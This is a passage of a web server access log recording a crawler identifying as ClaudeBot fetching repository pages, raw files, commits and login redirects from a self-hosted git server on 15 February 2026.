192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/About.tsx" [Client 216.73.216.188] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 9861] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2F.Notebook%2FOpcTest%2520program%2520by%2520claude.md" [Client 216.73.216.188] [Length 4853] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2FREADME.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 11095] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv/include/site" [Client 216.73.216.188] [Length 9922] [Gzip 2.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Hero.tsx" [Client 216.73.216.188] [Length 3077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/assets/js/i18n.js?display=rendered" [Client 216.73.216.188] [Length 10944] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.venv" [Client 216.73.216.188] [Length 11489] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10876] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 7694] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/index.tsx?display=rendered" [Client 216.73.216.188] [Length 11080] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/html/assets/images/ControlRoom2.png" [Client 216.73.216.188] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=nginx.conf" [Client 216.73.216.188] [Length 22377] [Gzip 3.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/.TemporaryDocument/assetpilot.ico" [Client 216.73.216.188] [Length 237700] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=unified&whitespace=ignore-change" [Client 216.73.216.188] [Length 17167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/archive/bf87175f515287fd25d175843915ffa6178025eb.zip" [Client 216.73.216.188] [Length 250125] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 9854] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 9906] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2FupdateRecord.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.g.props?display=source" [Client 216.73.216.188] [Length 11772] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components/Services.tsx" [Client 216.73.216.188] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/.gitignore?display=source" [Client 216.73.216.188] [Length 12189] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/index.tsx?display=source" [Client 216.73.216.188] [Length 11636] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/OpcTest%20program%20by%20claude.md?display=rendered" [Client 216.73.216.188] [Length 15902] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fbf87175f515287fd25d175843915ffa6178025eb" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fupdate_status.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fupdate_status.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/bf87175f515287fd25d175843915ffa6178025eb/.TemporaryDocument/MIGRATION_GUIDE.md" [Client 216.73.216.188] [Length 9907] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10860] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fstatus.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa?style=unified&whitespace=ignore-all" [Client 216.73.216.188] [Length 17167] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/OpcUaMinimal.csproj?display=rendered" [Client 216.73.216.188] [Length 10920] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 9902] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fupdate_status.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2Fmain.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fgraph" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/commit/3181052619700dceeeef81a9a0851130498f177e/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 1871] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fnpm%2Fdata%2Fkeys.json" [Client 216.73.216.188] [Length 4846] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/.gitignore?display=source" [Client 216.73.216.188] [Length 11687] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/commit/3181052619700dceeeef81a9a0851130498f177e/.Notebook/OpcTest%20program%20by%20claude.md?display=source" [Client 216.73.216.188] [Length 22501] [Gzip 6.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2F.TemporaryDocument%2FDOCKER_QUICKSTART.md" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.gitignore?display=rendered" [Client 216.73.216.188] [Length 11156] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a?style=split&whitespace=show-all" [Client 216.73.216.188] [Length 62457] [Gzip 12.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fbranch%2Fmain%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec?files=npm" [Client 216.73.216.188] [Length 307677] [Gzip 13.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10847] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Factivity%2Fquarterly" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fbranch%2Fmain%2Fasset_pilot_docker%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2Fmail_contact.py" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/calculator.py?display=rendered" [Client 216.73.216.188] [Length 10947] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/update_status.py" [Client 216.73.216.188] [Length 9781] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/update_status.py" [Client 216.73.216.188] [Length 824] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.gitignore?display=source" [Client 216.73.216.188] [Length 10953] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.html?display=rendered" [Client 216.73.216.188] [Length 10890] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.gitignore" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/index.html" [Client 216.73.216.188] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:09:33:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr 